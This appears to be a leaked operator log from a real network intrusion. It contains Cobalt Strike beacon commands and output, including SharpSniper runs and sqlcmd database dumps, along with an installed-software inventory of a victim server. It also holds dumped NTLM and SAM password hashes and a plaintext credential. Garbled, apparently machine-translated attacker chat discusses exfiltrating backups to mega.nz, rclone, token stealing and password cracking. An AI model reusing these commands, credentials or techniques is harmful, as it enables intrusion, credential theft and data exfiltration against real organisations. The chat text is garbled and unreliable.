[*] Tasked beacon to run .NET program: SharpSniper.exe canceleta Administrator j@mez9olk
[+] host called home, sent: 113773 bytes
[+] received output:
[-] Invoke_3 on EntryPoint failed.

beacon> execute-assembly /home/wevvewe/Desktop/working/Tools/exec-ass/SharpSniper.exe DHaase Administrator j@mez9olk
[*] Tasked beacon to run .NET program: SharpSniper.exe DHaase Administrator j@mez9olk
[+] host called home, sent: 113767 bytes
[+] received output:
[-] Invoke_3 on EntryPoint failed.

beacon> execute-assembly /home/wevvewe/Desktop/working/Tools/exec-ass/SharpSniper.exe orgbarracuda Administrator j@mez9olk
[*] Tasked beacon to run .NET program: SharpSniper.exe orgbarracuda Administrator j@mez9olk
[+] host called home, sent: 113779 bytes
[+] received output:
[-] Invoke_3 on EntryPoint failed.

beacon> execute-assembly /home/wevvewe/Desktop/working/Tools/exec-ass/SharpSniper.exe Uptime Administrator j@mez9olk
[*] Tasked beacon to run .NET program: SharpSniper.exe Uptime Administrator j@mez9olk
[+] host called home, sent: 113767 bytes
[+] received output:
[-] Invoke_3 on EntryPoint failed.

beacon> execute-assembly /home/wevvewe/Desktop/working/Tools/exec-ass/SharpSniper.exe adonixadmin Administrator j@mez9olk
[*] Tasked beacon to run .NET program: SharpSniper.exe adonixadmin Administrator j@mez9olk
[+] host called home, sent: 113777 bytes
[+] received output:
[-] Invoke_3 on EntryPoint failed.

beacon> execute-assembly /home/wevvewe/Desktop/working/Tools/exec-ass/SharpSniper.exe barracuda Administrator j@mez9olk
[*] Tasked beacon to run .NET program: SharpSniper.exe barracuda Administrator j@mez9olk
[+] host called home, sent: 113773 bytes
[+] received output:
[-] Invoke_3 on EntryPoint failed.

beacon> execute-assembly /home/wevvewe/Desktop/working/Tools/exec-ass/SharpSniper.exe BGW Administrator j@mez9olk
[*] Tasked beacon to run .NET program: SharpSniper.exe BGW Administrator j@mez9olk
[+] host called home, sent: 113761 bytes
[+] received output:
[-] Invoke_3 on EntryPoint failed.

beacon> execute-assembly /home/wevvewe/Desktop/working/Tools/exec-ass/SharpSniper.exe cevansa Administrator j@mez9olk
[*] Tasked beacon to run .NET program: SharpSniper.exe cevansa Administrator j@mez9olk
[+] host called home, sent: 113769 bytes
[+] received output:
[-] Invoke_3 on EntryPoint failed.

beacon> execute-assembly /home/wevvewe/Desktop/working/Tools/exec-ass/SharpSniper.exe EntAdmin Administrator j@mez9olk
[*] Tasked beacon to run .NET program: SharpSniper.exe EntAdmin Administrator j@mez9olk
[+] host called home, sent: 113771 bytes
[+] received output:
[-] Invoke_3 on EntryPoint failed.

beacon> execute-assembly /home/wevvewe/Desktop/working/Tools/exec-ass/SharpSniper.exe sagert Administrator j@mez9olk
[*] Tasked beacon to run .NET program: SharpSniper.exe sagert Administrator j@mez9olk
[+] host called home, sent: 113767 bytes
[+] received output:
[-] Invoke_3 on EntryPoint failed.

beacon> execute-assembly /home/wevvewe/Desktop/working/Tools/exec-ass/SharpSniper.exe veeam Administrator j@mez9olk
[*] Tasked beacon to run .NET program: SharpSniper.exe veeam Administrator j@mez9olk
beacon>
[-] Unknown command:
[+] host called home, sent: 113765 bytes
[+] received output:
[-] Invoke_3 on EntryPoint failed.

beacon> execute-assembly /home/wevvewe/Desktop/working/Tools/exec-ass/SharpSniper.exe alloyamms Administrator j@mez9olk
[*] Tasked beacon to run .NET program: SharpSniper.exe alloyamms Administrator j@mez9olk
[+] host called home, sent: 113773 bytes
[+] received output:
[-] Invoke_3 on EntryPoint failed.

beacon> execute-assembly /home/wevvewe/Desktop/working/Tools/exec-ass/SharpSniper.exe BarracudaBUP Administrator j@mez9olk
[*] Tasked beacon to run .NET program: SharpSniper.exe BarracudaBUP Administrator j@mez9olk
[+] host called home, sent: 113779 bytes
[+] received output:
[-] Invoke_3 on EntryPoint failed.

beacon> execute-assembly /home/wevvewe/Desktop/working/Tools/exec-ass/SharpSniper.exe CAncelet Administrator j@mez9olk
[*] Tasked beacon to run .NET program: SharpSniper.exe CAncelet Administrator j@mez9olk
[+] host called home, sent: 113771 bytes
[+] received output:
[-] Invoke_3 on EntryPoint failed.

beacon> execute-assembly /home/wevvewe/Desktop/working/Tools/exec-ass/SharpSniper.exe citrix_svc Administrator j@mez9olk
[*] Tasked beacon to run .NET program: SharpSniper.exe citrix_svc Administrator j@mez9olk
[+] host called home, sent: 113775 bytes
[+] received output:
[-] Invoke_3 on EntryPoint failed.

beacon> execute-assembly /home/wevvewe/Desktop/working/Tools/exec-ass/SharpSniper.exe gahbarracuda Administrator j@mez9olk
[*] Tasked beacon to run .NET program: SharpSniper.exe gahbarracuda Administrator j@mez9olk
[+] host called home, sent: 113779 bytes
[+] received output:
[-] Invoke_3 on EntryPoint failed.

beacon> execute-assembly /home/wevvewe/Desktop/working/Tools/exec-ass/SharpSniper.exe Services_Backup Administrator j@mez9olk
[*] Tasked beacon to run .NET program: SharpSniper.exe Services_Backup Administrator j@mez9olk
beacon>
[-] Unknown command:
[+] host called home, sent: 113785 bytes
[+] received output:
[-] Invoke_3 on EntryPoint failed.

beacon> execute-assembly /home/wevvewe/Desktop/working/Tools/exec-ass/SharpSniper.exe wstangea Administrator j@mez9olk
[*] Tasked beacon to run .NET program: SharpSniper.exe wstangea Administrator j@mez9olk
[+] host called home, sent: 113771 bytes
[+] received output:
[-] Invoke_3 on EntryPoint failed.

beacon> execute-assembly /home/wevvewe/Desktop/working/Tools/exec-ass/SharpSniper.exe Administrator j@mez9olk
[*] Tasked beacon to run .NET program: SharpSniper.exe Administrator Administrator j@mez9olk
[+] host called home, sent: 113781 bytes
[+] received output:
[-] Invoke_3 on EntryPoint failed.

``The rest? Change your password.
luqdztoszgtqucubfv@upived.online
asdergIJW3RETmjite453
``the account from mega where? everything is ready? have you checked the admins browsers for access there? Sage - accountanthttp://www.scribd.com/document/341656824/Sage-X3-User-Guide-REF-Shipping-Interface-SHPSYS-User-Setup-V6-pdfклиент asus may be portablx. some kind of alternative skulDisplayName : Sage X3 Base Sql Server V6 X3V6
what is it?
====== InstalledProducts ======

  DisplayName : Adobe Flash Player 32 ActiveX
  DisplayVersion : 32.0.0.465
  Publisher : Adobe
  InstallDate : 1/1/0001 12:00:00 AM
  Architecture : x86

  DisplayName : Kaseya Agent (alloysql01.servers.alloy - 10.89.11.24)
  DisplayVersion : 9.5.0.18
  Publisher : Kaseya
  InstallDate : 7/27/2020 12:00:00 AM
  Architecture : x86

  DisplayName : Microsoft Report Viewer Redistributable 2008 SP1
  DisplayVersion :
  Publisher : Microsoft Corporation
  InstallDate : 1/1/0001 12:00:00 AM
  Architecture : x86

  DisplayName : Safe X3 ADXADMIN
  DisplayVersion : 11.07.0002
  Publisher : Sage
  InstallDate : 1/22/2014 12:00:00 AM
  Architecture : x86

  DisplayName : PFA Server Registry Update
  DisplayVersion : 1.0.0.0
  Publisher : Hewlett-Packard Company
  InstallDate : 1/22/2014 12:00:00 AM
  Architecture : x86

  DisplayName : HP ProLiant PCI-express Power Management Update for Windows
  DisplayVersion : 1.3.0.0
  Publisher : Hewlett-Packard Company
  InstallDate : 1/22/2014 12:00:00 AM
  Architecture : x86

  DisplayName : Microsoft SQL Server Compact 3.5 SP2 ENU
  DisplayVersion : 3.5.8080.0
  Publisher : Microsoft Corporation
  InstallDate : 1/22/2014 12:00:00 AM
  Architecture : x86

  DisplayName : HP System Management Homepage
  DisplayVersion : 6.3.0
  Publisher : Hewlett-Packard Development Company, L.P.
  InstallDate : 1/22/2014 12:00:00 AM
  Architecture : x86

  DisplayName : Headless Server Registry Update
  DisplayVersion : 1.0.0.0
  Publisher : Hewlett-Packard Company
  InstallDate : 1/22/2014 12:00:00 AM
  Architecture : x86

  DisplayName : Microsoft Visual Studio Tools for Applications 2.0 - ENU
  DisplayVersion : 9.0.35191
  Publisher : Microsoft Corporation
  InstallDate : 1/22/2014 12:00:00 AM
  Architecture : x86

  DisplayName : Hotfix for Microsoft Visual Studio 2007 Tools for Applications - ENU (KB946040)
  DisplayVersion : 1
  Publisher : Microsoft Corporation
  InstallDate : 1/1/0001 12:00:00 AM
  Architecture : x86

  DisplayName : Hotfix for Microsoft Visual Studio 2007 Tools for Applications - ENU (KB946308)
  DisplayVersion : 1
  Publisher : Microsoft Corporation
  InstallDate : 1/1/0001 12:00:00 AM
  Architecture : x86

  DisplayName : Hotfix for Microsoft Visual Studio 2007 Tools for Applications - ENU (KB946344)
  DisplayVersion : 1
  Publisher : Microsoft Corporation
  InstallDate : 1/1/0001 12:00:00 AM
  Architecture : x86

  DisplayName : Hotfix for Microsoft Visual Studio 2007 Tools for Applications - ENU (KB947540)
  DisplayVersion : 1
  Publisher : Microsoft Corporation
  InstallDate : 1/1/0001 12:00:00 AM
  Architecture : x86

  DisplayName : Hotfix for Microsoft Visual Studio 2007 Tools for Applications - ENU (KB947789)
  DisplayVersion : 1
  Publisher : Microsoft Corporation
  InstallDate : 1/1/0001 12:00:00 AM
  Architecture : x86

  DisplayName : HP Version Control Agent
  DisplayVersion : 6.3.0.870
  Publisher : Hewlett Packard Development Company, L.P.
  InstallDate : 1/22/2014 12:00:00 AM
  Architecture : x86

  DisplayName : Microsoft SQL Server 2008 R2 Books Online
  DisplayVersion : 10.50.1600.1
  Publisher : Microsoft Corporation
  InstallDate : 1/22/2014 12:00:00 AM
  Architecture : x86

  DisplayName : SEI Central Point For SQL Server And Oracle - Setup
  DisplayVersion : 7.0.0
  Publisher : Ebisoft Solutions Inc.
  InstallDate : 3/10/2015 12:00:00 AM
  Architecture : x86

  DisplayName : Microsoft Visual C++ 2015-2019 Redistributable (x64) - 14.20.27508
  DisplayVersion : 14.20.27508.1
  Publisher : Microsoft Corporation
  InstallDate : 1/1/0001 12:00:00 AM
  Architecture : x86

  DisplayName : SEI OLAP For SQL Server - Setup
  DisplayVersion : 7.0.0
  Publisher : Ebisoft Solutions Inc.
  InstallDate : 3/10/2015 12:00:00 AM
  Architecture : x86

  DisplayName : Microsoft Visual C++ 2005 Redistributable
  DisplayVersion : 8.0.59193
  Publisher : Microsoft Corporation
  InstallDate : 1/22/2014 12:00:00 AM
  Architecture : x86

  DisplayName : Microsoft Visual C++ 2015-2019 Redistributable (x86) - 14.20.27508
  DisplayVersion : 14.20.27508.1
  Publisher : Microsoft Corporation
  InstallDate : 1/1/0001 12:00:00 AM
  Architecture : x86

  DisplayName : Microsoft Office 2003 Web Components
  DisplayVersion : 12.0.6213.1000
  Publisher : Microsoft Corporation
  InstallDate : 1/22/2014 12:00:00 AM
  Architecture : x86

  DisplayName : Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161
  DisplayVersion : 9.0.30729.6161
  Publisher : Microsoft Corporation
  InstallDate : 1/26/2019 12:00:00 AM
  Architecture : x86

  DisplayName : HP Array Configuration Utility
  DisplayVersion : 8.70.9.0
  Publisher : Hewlett Packard Development Company, L.P.
  InstallDate : 1/22/2014 12:00:00 AM
  Architecture : x86

  DisplayName : Microsoft Visual C++ 2019 X86 Minimum Runtime - 14.20.27508
  DisplayVersion : 14.20.27508
  Publisher : Microsoft Corporation
  InstallDate : 12/10/2020 12:00:00 AM
  Architecture : x86

  DisplayName : Microsoft Visual Studio 2008 Shell (integrated mode) - ENU
  DisplayVersion : 9.0.30729
  Publisher : Microsoft Corporation
  InstallDate : 1/22/2014 12:00:00 AM
  Architecture : x86

  DisplayName : Microsoft SQL Server Browser
  DisplayVersion : 10.51.2500.0
  Publisher : Microsoft Corporation
  InstallDate : 1/22/2014 12:00:00 AM
  Architecture : x86

  DisplayName : Microsoft Visual C++ 2019 X86 Additional Runtime - 14.20.27508
  DisplayVersion : 14.20.27508
  Publisher : Microsoft Corporation
  InstallDate : 12/10/2020 12:00:00 AM
  Architecture : x86

  DisplayName : Microsoft Report Viewer Redistributable 2008 (KB971119)
  DisplayVersion : 9.0.30731
  Publisher : Microsoft Corporation
  InstallDate : 1/22/2014 12:00:00 AM
  Architecture : x86

  DisplayName : Microsoft SQL Server 2008 R2 Policies
  DisplayVersion : 10.50.1600.1
  Publisher : Microsoft Corporation
  InstallDate : 1/22/2014 12:00:00 AM
  Architecture : x86

  DisplayName : Sage X3 Base Sql Server V6
  DisplayVersion : 6.00.0000
  Publisher : Sage
  InstallDate : 1/22/2014 12:00:00 AM
  Architecture : x86

  DisplayName : VMware vCenter Converter Standalone
  DisplayVersion : 6.2.0.8466193
  Publisher : VMware, Inc.
  InstallDate : 1/26/2019 12:00:00 AM
  Architecture : x86

  DisplayName : Sage X3 Base Sql Server V6 X3V6
  DisplayVersion :
  Publisher :
  InstallDate : 1/1/0001 12:00:00 AM
  Architecture : x86

  DisplayName : Microsoft SQL Server Compact 3.5 SP2 Query Tools ENU
  DisplayVersion : 3.5.8080.0
  Publisher : Microsoft Corporation
  InstallDate : 1/22/2014 12:00:00 AM
  Architecture : x86

  DisplayName : HP Array Configuration Utility CLI
  DisplayVersion : 8.70.8.0
  Publisher : Hewlett-Packard Development Company, L.P.
  InstallDate : 1/22/2014 12:00:00 AM
  Architecture : x86



  DisplayName : ATI Display Driver
  DisplayVersion : 8.24.50.5-090623a-083726C-HP
  Publisher :
  InstallDate : 1/1/0001 12:00:00 AM
  Architecture : x64

  DisplayName : Barracuda Backup Agent
  DisplayVersion : 6.5.00-300019-rel
  Publisher : Barracuda Networks, Inc.
  InstallDate : 1/1/0001 12:00:00 AM
  Architecture : x64

  DisplayName : Service Pack 1 for SQL Server 2008 R2 (KB2528583) (64-bit)
  DisplayVersion : 10.51.2500.0
  Publisher : Microsoft Corporation
  InstallDate : 1/22/2014 12:00:00 AM
  Architecture : x64

  DisplayName : Microsoft .NET Framework 4 Client Profile
  DisplayVersion : 4.0.30319
  Publisher : Microsoft Corporation
  InstallDate : 1/1/0001 12:00:00 AM
  Architecture : x64

  DisplayName : Microsoft .NET Framework 4 Extended
  DisplayVersion : 4.0.30319
  Publisher : Microsoft Corporation
  InstallDate : 1/1/0001 12:00:00 AM
  Architecture : x64

  DisplayName : Microsoft SQL Server 2008 R2 (64-bit)
  DisplayVersion :
  Publisher : Microsoft Corporation
  InstallDate : 1/1/0001 12:00:00 AM
  Architecture : x64

  DisplayName : Microsoft SQL Server 2008 R2 (64-bit)
  DisplayVersion :
  Publisher : Microsoft Corporation
  InstallDate : 1/1/0001 12:00:00 AM
  Architecture : x64

  DisplayName : Microsoft SQL Server 2008 R2 Setup (English)
  DisplayVersion : 10.51.2500.0
  Publisher : Microsoft Corporation
  InstallDate : 1/22/2014 12:00:00 AM
  Architecture : x64

  DisplayName : Microsoft Visual C++ 2005 Redistributable (x64)
  DisplayVersion : 8.0.56336
  Publisher : Microsoft Corporation
  InstallDate : 1/22/2014 12:00:00 AM
  Architecture : x64

  DisplayName : SQL Server 2008 R2 Reporting Services
  DisplayVersion : 10.50.1600.1
  Publisher : Microsoft Corporation
  InstallDate : 1/22/2014 12:00:00 AM
  Architecture : x64

  DisplayName : SQL Server 2008 R2 SP1 BI Development Studio
  DisplayVersion : 10.51.2500.0
  Publisher : Microsoft Corporation
  InstallDate : 1/22/2014 12:00:00 AM
  Architecture : x64

  DisplayName : SQL Server 2008 R2 SP1 Common Files
  DisplayVersion : 10.51.2500.0
  Publisher : Microsoft Corporation
  InstallDate : 1/22/2014 12:00:00 AM
  Architecture : x64

  DisplayName : SQL Server 2008 R2 SP1 Reporting Services
  DisplayVersion : 10.51.2500.0
  Publisher : Microsoft Corporation
  InstallDate : 1/22/2014 12:00:00 AM
  Architecture : x64

  DisplayName : VMware Tools
  DisplayVersion : 11.0.5.15389592
  Publisher : VMware, Inc.
  InstallDate : 12/10/2020 12:00:00 AM
  Architecture : x64

  DisplayName : Microsoft SQL Server VSS Writer
  DisplayVersion : 10.51.2500.0
  Publisher : Microsoft Corporation
  InstallDate : 1/22/2014 12:00:00 AM
  Architecture : x64

  DisplayName : SQL Server 2008 R2 SP1 Client Tools
  DisplayVersion : 10.51.2500.0
  Publisher : Microsoft Corporation
  InstallDate : 1/22/2014 12:00:00 AM
  Architecture : x64

  DisplayName : SQL Server 2008 R2 SP1 BI Development Studio
  DisplayVersion : 10.51.2500.0
  Publisher : Microsoft Corporation
  InstallDate : 1/22/2014 12:00:00 AM
  Architecture : x64

  DisplayName : SQL Server 2008 R2 SP1 Common Files
  DisplayVersion : 10.51.2500.0
  Publisher : Microsoft Corporation
  InstallDate : 1/22/2014 12:00:00 AM
  Architecture : x64

  DisplayName : Microsoft SQL Server System CLR Types (x64)
  DisplayVersion : 10.51.2500.0
  Publisher : Microsoft Corporation
  InstallDate : 1/22/2014 12:00:00 AM
  Architecture : x64

  DisplayName : Microsoft SQL Server 2008 R2 Native Client
  DisplayVersion : 10.51.2500.0
  Publisher : Microsoft Corporation
  InstallDate : 1/22/2014 12:00:00 AM
  Architecture : x64

  DisplayName : Microsoft Visual C++ 2019 X64 Additional Runtime - 14.20.27508
  DisplayVersion : 14.20.27508
  Publisher : Microsoft Corporation
  InstallDate : 12/10/2020 12:00:00 AM
  Architecture : x64

  DisplayName : SQL Server 2008 R2 SP1 Management Studio
  DisplayVersion : 10.51.2500.0
  Publisher : Microsoft Corporation
  InstallDate : 1/22/2014 12:00:00 AM
  Architecture : x64

  DisplayName : Microsoft Sync Framework Runtime v1.0 (x64)
  DisplayVersion : 1.0.1215.0
  Publisher : Microsoft Corporation
  InstallDate : 1/22/2014 12:00:00 AM
  Architecture : x64

  DisplayName : Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.6161
  DisplayVersion : 9.0.30729.6161
  Publisher : Microsoft Corporation
  InstallDate : 1/26/2019 12:00:00 AM
  Architecture : x64

  DisplayName : Microsoft Visual C++ 2005 Redistributable (x64)
  DisplayVersion : 8.0.59192
  Publisher : Microsoft Corporation
  InstallDate : 1/22/2014 12:00:00 AM
  Architecture : x64

  DisplayName : SQL Server 2008 R2 SP1 Analysis Services
  DisplayVersion : 10.51.2500.0
  Publisher : Microsoft Corporation
  InstallDate : 1/22/2014 12:00:00 AM
  Architecture : x64

  DisplayName : SQL Server 2008 R2 SP1 Management Studio
  DisplayVersion : 10.51.2500.0
  Publisher : Microsoft Corporation
  InstallDate : 1/22/2014 12:00:00 AM
  Architecture : x64

  DisplayName : HP Lights-Out Online Configuration Utility
  DisplayVersion : 3.1.1.0
  Publisher : Hewlett-Packard Development Company, L.P.
  InstallDate : 1/22/2014 12:00:00 AM
  Architecture : x64

  DisplayName  : HP ProLiant Remote Monitor Service
  DisplayVersion                 : 5.21.0.0
  Publisher                      : Hewlett-Packard Company
  InstallDate                    : 1/22/2014 12:00:00 AM
  Architecture                   : x64

  DisplayName                    : SQL Server 2008 R2 SP1 Integration Services
  DisplayVersion                 : 10.51.2500.0
  Publisher                      : Microsoft Corporation
  InstallDate                    : 1/22/2014 12:00:00 AM
  Architecture                   : x64

  DisplayName                    : Microsoft Sync Services for ADO.NET v2.0 (x64)
  DisplayVersion                 : 2.0.1215.0
  Publisher                      : Microsoft Corporation
  InstallDate                    : 1/22/2014 12:00:00 AM
  Architecture                   : x64

  DisplayName                    : Microsoft .NET Framework 4 Extended
  DisplayVersion                 : 4.0.30319
  Publisher                      : Microsoft Corporation
  InstallDate                    : 1/22/2014 12:00:00 AM
  Architecture                   : x64

  DisplayName                    : Microsoft Application Error Reporting
  DisplayVersion                 : 12.0.6015.5000
  Publisher                      : Microsoft Corporation
  InstallDate                    : 1/22/2014 12:00:00 AM
  Architecture                   : x64

  DisplayName                    : SQL Server 2008 R2 SP1 Full text search
  DisplayVersion                 : 10.51.2500.0
  Publisher                      : Microsoft Corporation
  InstallDate                    : 1/22/2014 12:00:00 AM
  Architecture                   : x64

  DisplayName                    : Symantec Endpoint Protection
  DisplayVersion                 : 14.2.1031.0100
  Publisher                      : Symantec Corporation
  InstallDate                    : 4/2/2019 12:00:00 AM
  Architecture                   : x64

  DisplayName                    : SQL Server 2008 R2 SP1 Database Engine Shared
  DisplayVersion                 : 10.51.2500.0
  Publisher                      : Microsoft Corporation
  InstallDate                    : 1/22/2014 12:00:00 AM
  Architecture                   : x64

  DisplayName                    : SQL Server 2008 R2 SP1 Integration Services
  DisplayVersion                 : 10.51.2500.0
  Publisher                      : Microsoft Corporation
  InstallDate                    : 1/22/2014 12:00:00 AM
  Architecture                   : x64

  DisplayName                    : Microsoft SQL Server 2008 Setup Support Files 
  DisplayVersion                 : 10.1.2731.0
  Publisher                      : Microsoft Corporation
  InstallDate                    : 1/22/2014 12:00:00 AM
  Architecture                   : x64

  DisplayName                    : SQL Server 2008 R2 SP1 Client Tools
  DisplayVersion                 : 10.51.2500.0
  Publisher                      : Microsoft Corporation
  InstallDate                    : 1/22/2014 12:00:00 AM
  Architecture                   : x64

  DisplayName                    : SQL Server 2008 R2 SP1 Database Engine Shared
  DisplayVersion                 : 10.51.2500.0
  Publisher                      : Microsoft Corporation
  InstallDate                    : 1/22/2014 12:00:00 AM
  Architecture                   : x64

  DisplayName                    : Microsoft SQL Server 2008 R2 RsFx Driver
  DisplayVersion                 : 10.51.2500.0
  Publisher                      : Microsoft Corporation
  InstallDate                    : 1/22/2014 12:00:00 AM
  Architecture                   : x64

  DisplayName                    : HP Insight Diagnostics  Online Edition for Windows
  DisplayVersion                 : 8.7.0
  Publisher                      : Hewlett-Packard Development Company, L.P.
  InstallDate                    : 1/22/2014 12:00:00 AM
  Architecture                   : x64

  DisplayName                    : HP Smart Array SAS/SATA Event Notification Service
  DisplayVersion                 : 6.24.0.64
  Publisher                      : Hewlett-Packard Development Company, L.P.
  InstallDate                    : 1/22/2014 12:00:00 AM
  Architecture                   : x64

  DisplayName                    : SQL Server 2008 R2 SP1 Analysis Services
  DisplayVersion                 : 10.51.2500.0
  Publisher                      : Microsoft Corporation
  InstallDate                    : 1/22/2014 12:00:00 AM
  Architecture                   : x64

  DisplayName                    : HP Insight Management Agents
  DisplayVersion                 : 8.70.0.0
  Publisher                      : Hewlett-Packard Company
  InstallDate                    : 1/22/2014 12:00:00 AM
  Architecture                   : x64

  DisplayName                    : Sql Server Customer Experience Improvement Program
  DisplayVersion                 : 10.50.1600.1
  Publisher                      : Microsoft Corporation
  InstallDate                    : 1/22/2014 12:00:00 AM
  Architecture                   : x64

  DisplayName                    : Microsoft Visual C++ 2019 X64 Minimum Runtime - 14.20.27508
  DisplayVersion                 : 14.20.27508
  Publisher                      : Microsoft Corporation
  InstallDate                    : 12/10/2020 12:00:00 AM
  Architecture                   : x64

  DisplayName                    : Microsoft .NET Framework 4 Client Profile
  DisplayVersion                 : 4.0.30319
  Publisher                      : Microsoft Corporation
  InstallDate                    : 1/22/2014 12:00:00 AM
  Architecture                   : x64

  DisplayName                    : SQL Server 2008 R2 SP1 Database Engine Services
  DisplayVersion                 : 10.51.2500.0
  Publisher                      : Microsoft Corporation
  InstallDate                    : 1/22/2014 12:00:00 AM
  Architecture                   : x64

  DisplayName                    : SQL Server 2008 R2 SP1 Database Engine Services
  DisplayVersion                 : 10.51.2500.0
  Publisher                      : Microsoft Corporation
  InstallDate                    : 1/22/2014 12:00:00 AM
  Architecture                   : x64

  DisplayName                    : HP ProLiant Integrated Management Log Viewer
  DisplayVersion                 : 5.25.0.0
  Publisher                      : Hewlett-Packard Company
  InstallDate                    : 1/22/2014 12:00:00 AM
  Architecture                   : x64





[*] Completed collection in 0.053 seconds
``about asus-order[ ](https://mediaeveryone.com/group/rtpcompany-com?msg=GPiNRPxiW29QHPLoH) and why in the water a few external clauses? Backup only from a box in the domain alono it hangs out in all trusts there is only 15 mb true one DA pumped out financial directors did not get out mail as their boxes externalBackups bore from `SQLPROD1.rtpco.local''
```
https://mega.nz/file/SZ1WASAL#MqS9puEoLsGzGYQgsFbGqzuq6gE2u1KEAb-c8FwE9Jc
``...and here's this miracle for 26 bucks/1 tb`` like `guys, put a bunch of eh....`` is there any point from asus at all to look for creeds? are we closing or not? @tl1[ ](https://mediaeveryone.com/group/rtpcompany-com?msg=y3oEn9wde85qxurgv) ok, now close in an hour and a half )We need to order marbled beef steaksI don't understand the definition of gjqve today until 12 october with this we're sitting in the middle of everything and everything[ ](https://mediaeveryone.com/group/rtpcompany-com?msg=SNimBdBH9fmNrRehJ) =on that skul server where we just backed up+ where did you see this? https://storeasuswebstorage.com/personal/ransomware_deleteon this stuff found? https://www.file.net/process/backupservice.exe.htmlони just cut off the external and in the course of the local everything will stand up the second backup moved to another server? I understand the sesurity event began lol) shut down start what? start as is? it directly in the temporary was unarchived in general this shit is a priority folder left?hmmm let's close today it's better not to postpone it will be looking at this now a lot of activity do you think? just on the first i haven't even filled the mega yet and transfer it to another server razloginpostri there megapost when you try to unload it not touched and even the archive is pinged first returned from the asus found accesses?
now not pinged respawn, respawn, failed failed failedloginya startuiluvayu meguna on one server all zaharchivala takavrode no that noise at the post office they were not?))) so it tech and picked up passwords - 453 things) and mail and tech? passwords puncher for several hours6 not configured, 4 just the creeds do not fit all unconfigured?[ ](https://mediaeveryone.com/group/rtpcompany-com?msg=3RnxsDkK4JCf8cEtc) with esx is not good out of 31 alive to 10 there are no creds i have not dealt with it, i decided to do it the familiar wayrcloneconsole version of what? what about the console version? i did not risk rclonomarchives backups how are you doing?
shell sqlcmd -S 10.89.11.15,1433 -E -Q "BACKUP DATABASE [Remote Desktop Services] TO DISK='D:\temporary\Remote_Desktop_Services.bak'"
``that's all the escaping and the file path can be written together or with _in the skul syntax to refer to such a thing should be written in []escaping incorrectlykakoy prankche patsy escaping
```
beacon> shell sqlcmd -S 10.89.11.15,1433 -E -Q "BACKUP DATABASE 'Remote Desktop Services' TO DISK='D:\temporary\Remote Desktop Services.bak'"
[*] Tasked beacon to run: sqlcmd -S 10.89.11.15,1433 -E -Q "BACKUP DATABASE 'Remote Desktop Services' TO DISK=D:\temporary\'Remote Desktop Services.bak'"
[+] host called home, sent: 158 bytes
[+] received output:
Msg 102, Level 15, State 1, Server AXSQL-PROD, Line 1
Incorrect syntax near 'Remote Desktop Services'.
``it's unlikely6 left didn't look there lieda then left 25 gig of space than 40 gig will be compressed in 7z to 24? all at once unload can unload to the megaOnBaseTestodnaya DB remaineda you have already backed up a few?I mean, their files do not touch that of course, and then a new one just put them in the archive maybe better these backups in the archivemaybe a third party drive zamapatlaga first remove the old backup to make room was Consider even better will) leave the new oneschem may they remove the old one did not have enough to bakakatemost ran outhas long been noticing that Inject crashes them crashed or something...on the other server I need the process sqlwriter/ѕqqlestrv when I look in the process sheet or what do you want? you want to get a list of processes no? eh no it's not right do it without a token
wmic proc... call create "cmd /c sqlwriter.exe"
i got it right? what difference does it make to get the list of processes from what context? within the localhostanetak it inmikom with a different context their dastmik requested at one of the first where i tried to check everything returned at the other server processes are not returned)) i reseeded and steal token = 0) vestmocontext change as done?
BACKUP DATABASE successfully processed 370 pages in 0.132 seconds (21.843 MB/sec).

``Eesdohlasha try it, don't inject it, try steal token from processa by the way``.
	 * Username : SqlService$
	 * Domain : RTPCO
	 * NTLM : b571730c862f68e2bb2e39b632d888a4
 
	 * Username : AXSQL-PROD$
	 * Domain : RTPCO
	 * NTLM : 35d143f9410ec2a3a917c0e5a55240c8
 
	 * Username : SqlIntService$
	 * Domain : RTPCO
	 * NTLM : b571730c862f68e2bb2e39b632d888a4
 
	 * Username : AxAdmin
	 * Domain : RTPCO
	 * NTLM : 75f5262bc7f6aa12fe8cbeaf23f12d77
 
	 * Username : bstangea
	 * Domain : RTPCO
	 * NTLM : f13d2f88fdf2a0970db1ece9ce90bc57
 
Administrator:500:aad3b435b51404eeaad3b435b51404ee:2bd07805e537f32fe65cdb7ec1ac64c6:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:1514a4ea314bd98b5649235b5131f403:::
```
 
```
	 * Username : SQLPROD1$
	 * Domain : rtpco
	 * NTLM : 5ee9d4286dfdba4dc96238d60c9d9225
 
	 * Username : SqlAgentService$
	 * Domain : RTPCO
	 * NTLM : b571730c862f68e2bb2e39b632d888a4
 
	 * Username : SqlService$
	 * Domain : RTPCO
	 * NTLM : b571730c862f68e2bb2e39b632d888a4
 
	 * Username : bstangea
	 * Domain : RTPCO
	 * NTLM : f13d2f88fdf2a0970db1ece9ce90bc57
 
	 * Username : wimansql
	 * Domain : rtpco
	 * NTLM : f5ff86c22606f7b57313f605cebe340f
 
	 * Username : jleadmin
	 * Domain : RTPCO
	 * NTLM : 7807f70fc7ebd9fc858c40dc4a3f68dd
 
Administrator:500:aad3b435b51404eeaad3b435b51404ee:2bd07805e537f32fe65cdb7ec1ac64c6:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
``dump the crudes from the whine''.
beacon> shell sqlcmd -S 10.89.0.99,1433 -E -Q "BACKUP DATABASE KLCAuditReporting TO DISK='D:\temporary\KLCAuditReporting.bak'"
[*] Tasked beacon to run: sqlcmd -S 10.89.0.99,1433 -E -Q "BACKUP DATABASE KLCAuditReporting TO DISK='D:\temporary\KLCAuditReporting.bak'"
[+] host called home, sent: 143 bytes
[+] received output:
Msg 916, Level 14, State 1, Server SQLPROD1, Line 1
The server principal "NT AUTHORITY\SYSTEM" is unable to access the database "KLCAuditReporting" under the current security context.
Msg 3013, Level 16, State 1, Server SQLPROD1, Line 1
BACKUP DATABASE is terminating abnormally.

``Peak from winlogon does not work? chop pai pomi https after a while it restores it and that's all not injected into the process is like that_model _temp similarlySolartWinds fuck it - no need it perfect timing two servers *backup of two ddts said two? does not look like two)∙SQLPROD1``
```
